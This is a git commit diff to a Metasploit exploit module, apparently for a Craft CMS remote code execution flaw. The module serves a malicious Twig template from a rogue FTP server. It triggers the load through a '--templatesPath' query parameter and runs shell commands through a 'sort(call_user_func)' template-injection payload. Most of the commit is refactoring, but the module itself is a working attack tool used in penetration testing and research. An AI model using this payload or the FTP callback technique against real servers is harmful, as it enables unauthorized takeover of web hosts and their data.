Minor fixes and improvements

jheysel-r7 · jheysel-r7 · commit 928634b9fe74 · 2025-01-10T10:26:17.000-08:00
diff --git a/modules/exploits/linux/http/craftcms_ftp_template.rb b/modules/exploits/linux/http/craftcms_ftp_template.rb
@@ -32,7 +32,7 @@ def initialize(info = {})
         'License' => MSF_LICENSE,
         'Privileged' => false,
         'Platform' => %w[unix linux],
-        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Arch' => [ARCH_CMD],
         'Targets' => [
           [
             'Unix/Linux Command Shell', {
@@ -53,6 +53,10 @@ def initialize(info = {})
     )
   end
 
+  def vulnerable_file_list
+    %w[/default/index.twig /default/index.html]
+  end
+
   def get_payload
     "{{ ['system', 'bash -c \"#{payload.encoded}\"'] | sort('call_user_func') }}"
   end
@@ -106,17 +110,29 @@ def on_client_command_cwd(cli, arg)
 
   def on_client_command_type(cli, arg)
     vprint_status('on_client_command_type')
-    arg == 'I' ? send_ftp_response(cli, 200, 'Type set to: Binary.') : send_ftp_response(cli, 500, 'Unknown type.')
+    if arg == 'I'
+      send_ftp_response(cli, 200, 'Type set to: Binary.')
+    else
+      send_ftp_response(cli, 500, 'Unknown type.')
+    end
   end
 
   def on_client_command_size(cli, arg)
     vprint_status('on_client_command_size')
-    arg == '/default/index.twig' ? send_ftp_response(cli, 213, get_payload.length.to_s) : send_ftp_response(cli, 550, "#{arg} is not retrievable.")
+    if vulnerable_file_list.include?(arg)
+      send_ftp_response(cli, 213, get_payload.length.to_s)
+    else
+      send_ftp_response(cli, 550, "#{arg} is not retrievable.")
+    end
   end
 
   def on_client_command_mdtm(cli, arg)
     vprint_status('on_client_command_mdtm')
-    arg == '/default/index.twig' ? send_ftp_response(cli, 213, Time.now.strftime('%Y%m%d%H%M%S')) : send_ftp_response(cli, 550, "#{arg} is not retrievable.")
+    if vulnerable_file_list.include?(arg)
+      send_ftp_response(cli, 213, Time.now.strftime('%Y%m%d%H%M%S'))
+    else
+      send_ftp_response(cli, 550, "#{arg} is not retrievable.")
+    end
   end
 
   def on_client_command_epsv(cli, _arg)
@@ -126,7 +142,7 @@ def on_client_command_epsv(cli, _arg)
 
   def on_client_command_retr(cli, arg)
     vprint_status('on_client_command_retr')
-    if ['/default/index.twig', '/default/index.html'].include?(arg)
+    if vulnerable_file_list.include?(arg)
       conn = establish_data_connection(cli)
       unless conn
         send_ftp_response(cli, 425, "Can't open data connection.")
@@ -162,28 +178,41 @@ def check
       'method' => 'GET',
       'vars_get' => { '--configPath' => "/#{nonce}" }
     )
-    res&.body&.include?('mkdir()') && res.body.include?(nonce) ? CheckCode::Vulnerable : CheckCode::Safe
+
+    if res&.body&.include?('mkdir()') && res&.body&.include?(nonce)
+      CheckCode::Vulnerable
+    else
+      CheckCode::Safe
+    end
   end
 
   def trigger_http_request
     vprint_status('Triggering HTTP request...')
     templates_path = "ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}"
     send_request_raw(
       'uri' => normalize_uri(target_uri.path) + "?--templatesPath=#{templates_path}",
-      'method' => 'GET',
-      'headers' => { 'User-Agent' => 'Mozilla/5.0' }
+      'method' => 'GET'
     )
   rescue StandardError => e
     vprint_error("HTTP request failed: #{e.message}")
   end
 
+  def start_ftp_service
+    if datastore['SSL'] == true
+      reset_ssl = true
+      datastore['SSL'] = false
+    end
+    start_service
+    if reset_ssl
+      datastore['SSL'] = true
+    end
+  end
+
   def exploit
     vprint_status('Starting FTP service...')
-    start_service
+    start_ftp_service
     vprint_status("FTP server started on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
     vprint_status('Sending HTTP request to trigger the payload...')
     trigger_http_request
-    vprint_status('Waiting for FTP client connections...')
-    vprint_status('Shutting down FTP service...')
   end
 end
